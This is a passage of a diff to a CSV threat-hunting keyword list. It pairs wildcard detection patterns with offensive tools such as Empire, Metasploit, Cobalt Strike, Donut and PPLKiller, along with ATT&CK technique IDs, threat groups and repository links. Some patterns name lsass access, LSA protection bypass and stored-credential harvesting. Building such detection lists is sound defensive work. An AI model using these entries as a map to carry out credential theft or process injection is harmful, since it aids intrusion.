T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessHerpaderping_x64*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderping_x86*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" +"*ProcessHerpaderpingTemplate*","offensive_tool_keyword","metasploit","Metasploit is a widely-used. open-source framework designed for penetration testing. vulnerability assessment. and exploit development. It provides security professionals and researchers with a comprehensive platform to discover. exploit. and validate vulnerabilities in computer systems and networks. Metasploit includes a large database of pre-built exploits. payloads. and auxiliary modules that can be used to test various attack vectors. identify security weaknesses. and simulate real-world cyberattacks. By utilizing Metasploit. security teams can better understand potential threats and improve their overall security posture.","T1001 - T1021 - T1024 - T1033 - T1047 - T1075 - T1059 - T1064 - T1090 - T1204 -T1210 - T1218","TA0001 - TA0002 - TA0003 - TA0004 - TA0005 - TA0006 - TA0007 - TA0008 - TA0009 - TA0011 - TA0010 - TA0040","N/A","N/A","Frameworks","https://github.com/rapid7/metasploit-framework","1","1","N/A","10","10","31317","13504","2023-10-04T21:36:25Z","2011-08-30T06:13:20Z" "*processhider.c*","offensive_tool_keyword","Sudomy","Ghost In The Shell - This tool will setting up your backdoor/rootkits when backdoor already setup it will be hidden your spesisifc process.unlimited your session in metasploit and transparent. Even when it killed. it will re-run again. There always be a procces which while run another process.So we can assume that this procces is unstopable like a Ghost in The Shell","T1587 - T1588 - T1608","N/A","N/A","N/A","Exploitation tools","https://github.com/screetsec/Vegile","1","1","N/A","N/A","7","686","175","2022-09-01T01:54:35Z","2018-01-02T05:29:48Z" -"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*-ProcessID * -Dll * -Module *","offensive_tool_keyword","empire","empire script arguments Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1047","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" "*processImplantMessage*","offensive_tool_keyword","Nuages","A modular C2 framework","T1027 - T1055 - T1071 - T1105 - T1566 - T1570","TA0001 - TA0002 - TA0003 - TA0008 - TA0010","N/A","N/A","C2","https://github.com/p3nt4/Nuages","1","1","N/A","10","10","373","80","2023-10-02T23:24:19Z","2019-05-12T11:00:35Z" -"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1326","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" +"*process-inject *","offensive_tool_keyword","cobaltstrike","Cobalt Strike Malleable C2 Design and Reference Guide","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/threatexpress/malleable-c2","1","0","N/A","10","10","1329","282","2023-08-01T15:07:51Z","2018-08-14T14:19:43Z" "*processinject_min_alloc*","offensive_tool_keyword","cobaltstrike","SourcePoint is a C2 profile generator for Cobalt Strike command and control servers designed to ensure evasion.","T1548.002 - T1548.003 - T1134.001 - T1134.003 - T1134.004 - T1087.002 - T1071.001 - T1071.004 - T1071.005 - T1197 - T1185 - T1059.001 - T1059.003 - T1059.004 - T1068.002 - T1083 - T1564.010 - T1562.001 - T1005 - T1001.003 - T1030 - T1140 - T1573.001 - T1573.002 - T1203 - T1068.001 - T1083 - T1135 - T1095 - T1027 - T1137.001 - T1003.001 - T1003.002 - T1069.001 - T1069.002 - T1057 - T1055.001 - T1055.012 - T1572 - T1090.001 - T1090.004 - T1012 - T1620 - T1021.001 - T1021.002 - T1021.003 - T1021.004 - T1021.006 - T1018 - T1029 - T1113 - T1518 - T1553.002 - T1218.011 - T1016 - T1049 - T1007 - T1569.002 - T1550.002 - T1078.002 - T1078.003 - T1047","TA0002 - TA0003 - TA0005 - TA0006 - TA0007 - TA0008 - TA0011 - TA0040","N/A","DarkHydrus - FIN6 - TA505 - Cobalt Group - APT19 - APT41 - Threat Group-3390 - FIN7 - Earth Lusca - Leviathan - Indrik Spider - Aquatic Panda - CopyKittens - Wizard Spider - APT32 - APT37 - LuminousMoth - menuPass - Mustang Panda - Chimera - APT29","C2","https://github.com/Tylous/SourcePoint","1","1","N/A","10","10","792","122","2022-11-17T01:04:04Z","2021-08-06T20:55:26Z" -"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2877","557","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" -"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","744","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" -"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessRDPFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessRDPLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessSuperPuTTYFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*Process-TaskingPackets*","offensive_tool_keyword","empire","empire function name of agent.ps1.Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1059","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessThoroughLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" -"*ProcessThoroughRemote*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","0","N/A","N/A","10","7102","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessManager.exe --machine *","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*ProcessManager.exe --name explorer*","offensive_tool_keyword","donut","Donut is a position-independent code that enables in-memory execution of VBScript. JScript. EXE. DLL files and dotNET assemblies. A module created by Donut can either be staged from a HTTP server or embedded directly in the loader itself","T1055 - T1027 - T1202","TA0002 - TA0003 ","N/A","Indrik Spider","Exploitation tools","https://github.com/TheWover/donut","1","0","N/A","N/A","10","2878","558","2023-04-26T21:11:01Z","2019-03-27T23:24:44Z" +"*processPIDByName*lsass.exe*","offensive_tool_keyword","PPLKiller","Tool to bypass LSA Protection (aka Protected Process Light)","T1547.002 - T1558.003","TA0004 - TA0005","N/A","N/A","Defense Evasion","https://github.com/RedCursorSecurityConsulting/PPLKiller","1","0","N/A","10","8","745","127","2022-12-04T23:38:31Z","2020-07-06T10:11:49Z" +"*ProcessPPKFile*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - T1041 - T1567.001 - T1567.002 - T1068 - T1210 - T1083 - T1615 - T1574.001 - T1574.004 - T1574.007 - T1574.008 - T1574.009 - T1070.006 - T1105 - T1056.001 - T1056.004 - T1106 - T1046 - T1135 - T1040 - T1027 - T1003.001 - T1057 - T1055 - T1021.003 - T1021.004 - T1053.005 - T1113 - T1518.001 - T1558.001 - T1558.002 - T1558.003 - T1082 - T1016 - T1049 - T1033 - T1569.002 - T1127.001 - T1552.001 - T1552.004 - T1550.002 - T1125 - T1102.002 - T1106","TA0004 - TA0006 - TA0007 - TA0040 - TA0010 - TA0011 - TA0009 - TA0003 - TA0002 - TA0005","N/A","LazyScripter - FIN10 - MuddyWater - CopyKittens - Silence - WIRTE - HEXANE - APT33 - Leviathan - APT41 - Wizard Spider - APT19 - Indrik Spider - Turla - ","Frameworks","https://github.com/EmpireProject/Empire","1","1","N/A","N/A","10","7103","2790","2020-01-19T22:50:59Z","2015-08-05T18:25:57Z" +"*ProcessPuTTYLocal*","offensive_tool_keyword","empire","Empire scripts functions. Empire is an open source. cross-platform remote administration and post-exploitation framework that is publicly available on GitHub. While the tool itself is primarily written in Python. the post-exploitation agents are written in pure PowerShell for Windows and Python for Linux/macOS. Empire was one of five tools singled out by a joint report on public hacking tools being widely used by adversaries","T1548.002 - T1134 - T1134.002 - T1134.005 - T1087.001 - T1087.002 - T1557.001 - T1071.001 - T1560 - T1119 - T1020 - T1547.001 - T1547.005 - T1547.009 - T1217 - T1115 - T1059.001 - T1059.003 - T1136.001 - T1136.002 - T1543.003 - T1555.003 - T1484.001 - T1482 - T1114.001 - T1573.002 - T1546.008 - 